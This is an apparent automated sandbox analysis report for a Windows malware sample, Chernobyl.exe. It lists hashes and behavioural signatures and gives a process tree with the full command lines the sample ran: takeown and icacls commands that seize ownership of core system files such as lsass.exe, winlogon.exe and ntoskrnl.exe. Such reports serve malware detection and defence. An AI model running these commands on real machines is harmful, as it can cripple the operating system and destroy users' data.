Analysis
-
max time kernel
46s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02-03-2024 19:25
Static task
static1
1 signatures
General
-
Target
Chernobyl.exe
-
Size
126KB
-
MD5
d59ea869efea7a22baf00e179e05cca8
-
SHA1
96a55a0d6d305dd7c9e11c6fba5eb31dac8d4eab
-
SHA256
5afc406a9a72118bd28a15c671a02a1972fc4dfe4cab66db784f4a22a0ae3968
-
SHA512
a69efdcef30ed5450e9f9d195494d6303b48efdbe253fb740bdc299e7325aebba2e7c27668239b5aa7eddc6717e26c2318700d326ed7e0a8463731f27eb4d892
-
SSDEEP
3072:vEbAxMSwSRSE8fdSIbvh8wqYOeuDAQa3tC6cVpL4JOu2/JseB:vEbAO7WEzv4TatcVNqOR/Jd
Malware Config
Signatures
-
Possible privilege escalation attempt 14 IoCs
Processes:
takeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exepid process 2472 takeown.exe 2600 takeown.exe 2572 takeown.exe 2560 icacls.exe 668 icacls.exe 112 takeown.exe 2700 takeown.exe 2444 takeown.exe 2464 takeown.exe 2000 takeown.exe 676 takeown.exe 1692 takeown.exe 2408 icacls.exe 328 takeown.exe -
Modifies file permissions 1 TTPs 14 IoCs
Processes:
takeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 2444 takeown.exe 2560 icacls.exe 2472 takeown.exe 328 takeown.exe 668 icacls.exe 1692 takeown.exe 2408 icacls.exe 2700 takeown.exe 676 takeown.exe 112 takeown.exe 2572 takeown.exe 2464 takeown.exe 2000 takeown.exe 2600 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
Chernobyl.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 2208 Chernobyl.exe Token: SeDebugPrivilege 2208 Chernobyl.exe Token: SeTakeOwnershipPrivilege 2572 takeown.exe Token: SeTakeOwnershipPrivilege 2700 takeown.exe Token: SeTakeOwnershipPrivilege 2444 takeown.exe Token: SeTakeOwnershipPrivilege 2464 takeown.exe Token: SeTakeOwnershipPrivilege 2472 takeown.exe Token: SeTakeOwnershipPrivilege 2000 takeown.exe Token: SeTakeOwnershipPrivilege 676 takeown.exe Token: SeTakeOwnershipPrivilege 328 takeown.exe Token: SeTakeOwnershipPrivilege 2600 takeown.exe Token: SeTakeOwnershipPrivilege 1692 takeown.exe Token: SeTakeOwnershipPrivilege 112 takeown.exe Token: SeShutdownPrivilege 2208 Chernobyl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Chernobyl.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2208 wrote to memory of 2660 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2660 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2660 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2660 2208 Chernobyl.exe cmd.exe PID 2660 wrote to memory of 2572 2660 cmd.exe takeown.exe PID 2660 wrote to memory of 2572 2660 cmd.exe takeown.exe PID 2660 wrote to memory of 2572 2660 cmd.exe takeown.exe PID 2660 wrote to memory of 2572 2660 cmd.exe takeown.exe PID 2208 wrote to memory of 2632 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2632 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2632 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2632 2208 Chernobyl.exe cmd.exe PID 2632 wrote to memory of 2700 2632 cmd.exe takeown.exe PID 2632 wrote to memory of 2700 2632 cmd.exe takeown.exe PID 2632 wrote to memory of 2700 2632 cmd.exe takeown.exe PID 2632 wrote to memory of 2700 2632 cmd.exe takeown.exe PID 2208 wrote to memory of 2764 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2764 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2764 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2764 2208 Chernobyl.exe cmd.exe PID 2764 wrote to memory of 2444 2764 cmd.exe takeown.exe PID 2764 wrote to memory of 2444 2764 cmd.exe takeown.exe PID 2764 wrote to memory of 2444 2764 cmd.exe takeown.exe PID 2764 wrote to memory of 2444 2764 cmd.exe takeown.exe PID 2764 wrote to memory of 2560 2764 cmd.exe icacls.exe PID 2764 wrote to memory of 2560 2764 cmd.exe icacls.exe PID 2764 wrote to memory of 2560 2764 cmd.exe icacls.exe PID 2764 wrote to memory of 2560 2764 cmd.exe icacls.exe PID 2208 wrote to memory of 2468 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2468 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2468 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2468 2208 Chernobyl.exe cmd.exe PID 2468 wrote to memory of 2464 2468 cmd.exe takeown.exe PID 2468 wrote to memory of 2464 2468 cmd.exe takeown.exe PID 2468 wrote to memory of 2464 2468 cmd.exe takeown.exe PID 2468 wrote to memory of 2464 2468 cmd.exe takeown.exe PID 2208 wrote to memory of 2540 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2540 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2540 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2540 2208 Chernobyl.exe cmd.exe PID 2540 wrote to memory of 2472 2540 cmd.exe takeown.exe PID 2540 wrote to memory of 2472 2540 cmd.exe takeown.exe PID 2540 wrote to memory of 2472 2540 cmd.exe takeown.exe PID 2540 wrote to memory of 2472 2540 cmd.exe takeown.exe PID 2208 wrote to memory of 1344 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 1344 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 1344 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 1344 2208 Chernobyl.exe cmd.exe PID 1344 wrote to memory of 2000 1344 cmd.exe takeown.exe PID 1344 wrote to memory of 2000 1344 cmd.exe takeown.exe PID 1344 wrote to memory of 2000 1344 cmd.exe takeown.exe PID 1344 wrote to memory of 2000 1344 cmd.exe takeown.exe PID 2208 wrote to memory of 2252 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2252 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2252 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 2252 2208 Chernobyl.exe cmd.exe PID 2252 wrote to memory of 676 2252 cmd.exe takeown.exe PID 2252 wrote to memory of 676 2252 cmd.exe takeown.exe PID 2252 wrote to memory of 676 2252 cmd.exe takeown.exe PID 2252 wrote to memory of 676 2252 cmd.exe takeown.exe PID 2208 wrote to memory of 1176 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 1176 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 1176 2208 Chernobyl.exe cmd.exe PID 2208 wrote to memory of 1176 2208 Chernobyl.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\smss.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\csrss.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\wininit.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\wininit.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\lsass.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\services.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit2⤵PID:1176
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\winload.efi3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit2⤵PID:1588
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:2832
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\ntoskrnl.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit2⤵PID:1136
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\svchost.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\svchost.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:668
-
-